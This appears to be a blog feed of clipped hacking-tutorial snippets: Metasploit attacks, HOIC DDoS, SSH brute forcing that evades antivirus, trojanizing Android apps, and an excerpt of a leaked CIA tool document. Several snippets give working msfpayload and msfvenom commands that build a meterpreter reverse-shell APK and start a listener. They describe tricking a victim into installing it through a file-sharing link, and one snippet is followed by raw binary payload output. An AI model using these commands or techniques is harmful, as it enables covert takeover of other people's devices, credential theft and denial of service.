Posts

How to attack Windows 10 machine with metasploit on Kali Linux [updated 2021]

Image
The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines.  from Pocket https://ift.tt/u2LJlqw via IFTTT

How to DDOS an IP using HOIC

Image
Disclaimer : This post is only for the educational purpose. How to DDOS an IP using HOIC: A distributed denial of service (DDOS) attack involves a group of compromised systems usually infected with Trojans used to perform a DoS attack on a target system or network. from Pocket https://ift.tt/TQbkDp3 via IFTTT

SSH Brute Force Attack Tool using PuTTY / Plink (ssh-putty-brute.ps1)

Image
This blog post introduces our newest addition to our pentesting arsenal, the ssh-putty-brute.ps1. This tool can turn the well-known PuTTY SSH client (putty.exe or plink.exe) into a reliable SSH login brute force tool which in addition also evades any Antivirus or endpoint protection solution. from Pocket https://ift.tt/hIuM7At via IFTTT

SFTP File Transfer Protocol - get SFTP client & server

Image
SFTP (SSH File Transfer Protocol) is a secure file transfer protocol. It runs over the SSH protocol. It supports the full security and authentication functionality of SSH. SFTP has pretty much replaced legacy FTP as a file transfer protocol, and is quickly replacing FTP/S. from Pocket https://ift.tt/vp45zDQ via IFTTT

How to Troubleshoot "SSH Connection Refused" : 5 Easy Fixes!

Image
OpenSSH is an open-source version of the Secure Shell (SSH) protocol that can be used to login remotely to a server and to control remote Linux-based systems. OpenSSH provides secure encrypted communication between two untrusted hosts over an insecure network. from Pocket https://ift.tt/olYwXFc via IFTTT

Configuring OpenSSH on Windows

Image
In the passwd file, you will notice that the home directory of the user is set as /home/username, with username being the name of the account. In the default install, the /home directory is set to the default profile directory for all users. from Pocket https://ift.tt/kFWzon4 via IFTTT

Server-side Attacks With Kali linux : Best Collections of Hacking Tools : Part-2

Image
Vega is a security testing tool used to crawl a website and analyze page content to find links as well as form parameters. To launch Vega, go to Web Applications | Web Vulnerability Scanners and select Vega. Vega will flash an introduction banner and display a GUI. from Pocket https://ift.tt/PQyjcXn via IFTTT

How to Hack a Web Server

Image
Customers usually turn to the internet to get information and buy products and services. Towards that end, most organizations have websites.Most websites store valuable information such as credit card numbers, email address and passwords, etc. This has made them targets to attackers. from Pocket https://ift.tt/twveyRO via IFTTT

Multiple Ways To Exploiting HTTP Authentication

Image
In this article, we will learn about how to configure the password-protected Apache Web Server to restrict from online visitors without validation so that we can hide some essential and critical information to the unauthenticated users and how to penetrate it’s the weak configuration to break its from Pocket https://ift.tt/pgfE9yK via IFTTT

SSH Pentesting Guide

Image
If you’d like to suggest an amendment or contribute to this article send us an email through to [email protected] We’ll also do our best to propagate additions and suggestions from social media! from Pocket https://ift.tt/azvjACT via IFTTT

SSH Pentesting Guide

Image
If you’d like to suggest an amendment or contribute to this article send us an email through to [email protected] We’ll also do our best to propagate additions and suggestions from social media! from Pocket https://ift.tt/azvjACT via IFTTT

Hacking the SSH server, again

Image
In the previous howto, we have seen how to research about a vulnerability in the FTP service running on our target system and exploit it to gain a shell on that system. In this howto, we will see hacking the SSH service running on port 22. It can be seen that the target is running OPenSSH 4. from Pocket https://ift.tt/3MJQLZV via IFTTT

Extending the Language with a Malware API

Creating a Remote Reverse Shell Tunnel Attackers use remote shells to connect to their victim's remote machine using an interactive shell. Remote shells enable an attacker to execute OS commands as though he were sitting in front of the victim's machine, and execute commands on behalf of the victim's identity on which the shell's process is running. Telnet and RSH are two examples of “legitimate” services that enable remote clients to connect to another machine and execute commands via the shell's console. Those “direct” or “forward” remote shells are established by the client to the server (the server must, of course, listen to those requests and decide whether to accept them). From an attacker's point of view, it is beneficial to be able to connect to a remote machine and execute OS-level commands. After breaking into a machine, the attacker can set a remote shell server on the machine so that he can establish connections to the machine at a late

Usefull Google Chrome Extensions For Penetration Testers & Security Researcher 2022

1. Web Developer  is a Google Chrome extension that adds a tool bar with various web development tools in Chrome. With these tools, users can perform various web development tasks. This extension helps analyzing web application elements like HTML and JS..                                                                   Add Web Developer Extension in Chrome here    2. Firebug Lite for Google Chrome  provides a rich visual environment to analyze HTML elements, DOM elements and other Box Model Shading. It also provides live CSS editing. It helps in analyzing how an application is working on the client’s side.Add Firebug Lite to Google Chrome: 3. d3coder, is another nice Google Chrome extension that helps penetration testers. It enables us to encode and decode selected text via context menu. Thus it reduces the time to encode and decode strings by using separate tools. This extension can perform a wide range of functions. See the list below: Timestamp decoding rot13 en-/decodi

How To Remotely Hack Android Device Using Kali Linux

Step 1      Fire-Up Kali:   Open a terminal, and make a Trojan .apk   You can do this by typing :   msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)   Step 2      Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : msfconsole Step 3      Set-Up a Listener: After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external) Step 4      Exploit! At last type: exploit t o start the listener. Copy the application that you made (Upgrader.apk) from the root folder, to you android phone. Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com ). Then send the link that

CIA LEAKED HACKING TOOL - PROTEGO

Building the Protego Images  SECRET//NOFORN Building the Protego Images Introduction This document describes the builds required for a complete Protego system. Processor images built for the Protego system: There are seven build images created for a complete Protego system. The following build images are unique for each Collar, Tube, and Missile set and the keys must match: 1) P1.X.production.hex 2) P2.X.production.hex 3) P3.X.production.hex The following are used on the Deployment Box for configuration control of any Protego system: 4) P4.X.production.hex 5) P5.X.production.hex The following build images are used when reprogramming the MP processor: 6) P1_S.X.production.hex 7) P2_ Maintenance.production.hex Locations of images: 1) P1 - Master Processor (MP), Master Processor on PWA 2) P1_S - Master Processor (MP), Slave Processor on PWA 3) P2 - Tube Smart Switch (TSS) Processor 4) P3 - Missile Smart Switch (MSS) Processor 5) P4 - Deployment Box Slave Processor on PWA 6) P5 - Deploymen

Nasha Exploit Injecting As A Metasploit Payloads Apk Into Android Applications To Remote Control Any Android Device

Image
On the kali linux terminal type - (root💀diago)-[~]# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.*.* LPORT=4444 R > Nasha.apk   [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder specified, outputting raw payload Payload size: 10184 bytes PD�>T�����PndroidManifest.xml��KoSGǏ�@�qB�1y@ O��@��@��"��]T�`B�▒+8��Z������� U�K>@�]tQU�˪� uY� S�V{�B��F�E*~&B��n�,tz��                       =�����^@?B�@B3���2�S��g�7ë"�@��(��>�^B�a�<��YMtz��"�z����z�]�!� �j� Nh���k�f�              �} }                  ��^A�uD����=��_�����7���P=za�v�m�m�<~��r�$C���K▒q%����}���T@�]�����K����=�z��-FM��s\)E{��MK?��G ��o�~��3��I�?��V�"ε2�qԏ�te        ���;�� �$jR�<�ef�#5�=z�T�8-#�5����.��h��3�~��O��t       ��i��^��ۼ���5��~%S,��C-C> \M?s�KI�az_/��[vγ�▒��▒�0�ȸ�2���E��,^�9�Ĕ�2z�▒��d�_��F*�z���lI򈘹�±,����*���7�eZO� X^�^�H�����X{�j�7ތY�u���l���ά�K�s�$��+&g

Embed a Metasploit Payload in an Original .Apk File 2

Embed a Metasploit Payload in an Original .Apk File | Part 2 – Do It Manually Hi guys, I'm here again with my second tutorial, as I promised. Metasploit's flagship product, the Meterpreter, is very powerful and an all-purpose payload. Once installed on the victim machine, we can do whatever we want to their system by sending out commands to it. For example, we could grab sensitive data out of the compromised system. The Meterpreter payload also comes as an installable .apk file for Android systems. Great! Now we can use Metasploit to compromise Android phones also. But if you have tried out these payloads you would know that they do not look convincing. No one in their right mind is going to install and run such an app, which apparently does nothing when it is opened. So how are we going to make the victim run the payload app in their phone? One of the solutions is that you can embed the payload inside another legitimate app. The app will look and behave exactly as the original

Injecting Metasploit Payloads into Android Applications

 Injecting Metasploit Payloads into Android Applications It is possible to use a legitimate Android application as a Trojan in order to exploit the actual device of the user. The reasons of why this test is important in every android security assessment is because it would allow the penetration tester to discover if there are certain protections around the binary in place. If there are not and the application could be trojanized by a malicious attacker then the client should be aware. The process of injecting Metasploit payloads into Android applications can be done both manually and automatically. This post will examine the automated process. However if in an engagement time is not a factor then the manual method should be considered. Payload Generation Before anything else the payload needs to be generated that it will be used in order to compromise the mobile device. Metasploit Framework could be used for this activity since it can produce a payload and then extract it as APK file.

FTP Commands for Linux and UNIX

FTP, by itself, is not a reliable way to exchange sensitive business information because it is prone to security attacks. Serv-U MFT Server supports FTP, FTPS, SFTP and HTTP/S protocols for file transfer over IPv4 and IPv6 networks. Give it a try FTP (File Transfer Protocol) is a standard network protocol used to exchange files between computers on a private network or through the Internet. There are three ways in which FTP is commonly accessed: * Command-line FTP client. * Web browser. * Graphical FTP clients. The first two are straightforward methods that allow you to directly use a Web browser (such as Google Chrome, Firefox, Internet Explorer) or an FTP client application (such as FTP Voyager®) to connect to the FTP server to exchange files. Using the command-line interface, you need to enter a set of commands to send or receive files from other computers. Windows, Mac OS X, and Linux operating systems have built-in command-line clients that can be used for establishing an FTP conn